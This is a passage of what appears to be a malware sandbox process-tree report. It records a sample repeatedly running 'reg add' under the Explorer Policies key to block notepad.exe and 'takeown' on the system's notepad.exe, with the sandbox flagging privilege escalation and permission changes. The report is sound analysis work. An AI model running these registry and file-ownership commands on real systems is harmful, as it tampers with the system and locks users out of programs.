      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5200
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5296
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7092
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7088
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5724
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5708
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6048
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:4572
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5180
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5820
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6192
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6340
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:6272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6908
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6188
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6800
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5292
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:5648
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6600
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6344
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6404
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5584
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6484
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5924
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6980
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6744
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:1396
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:7808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4700
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5824
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:7132
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:8084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6864
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:4452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6496
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4320
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5264
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:6996
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:6296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4956
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:7156
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:7464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5488
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4596
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f"
    3⤵
    PID:5216
  - - C:\Windows\system32\reg.exe
      reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "1" /t REG_SZ /d "notepad.exe" /f
      4⤵
      PID:4316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3124
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2964
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3308
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:6532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6976
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:1452
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:1688
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2244
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2680
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:1100
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2456
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5316
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:6272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4500
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3660
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:112
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2808
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:7992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4992
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:6348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6660
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3108
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5808
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4816
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Possible privilege escalation attempt
      Suspicious use of AdjustPrivilegeToken
      PID:5080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3340
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:5132
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:6080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:3856
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2724
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6948
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4560
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:6764
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:2952
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:4312
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7260
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7284
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7324
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7348
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7504
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7660
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7672
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7736
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Modifies file permissions
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7784
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7792
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7828
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7884
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:7940
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:1104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:8008
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:6320
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:8048
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:6512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "takeown /f "C:\Windows\System32\notepad.exe" /a"
    3⤵
    PID:8156
  - - C:\Windows\system32\takeown.exe
      takeown /f "C:\Windows\System32\notepad.exe" /a
      4⤵
      PID:7108
- - C:\Windows\system32\cmd.exe
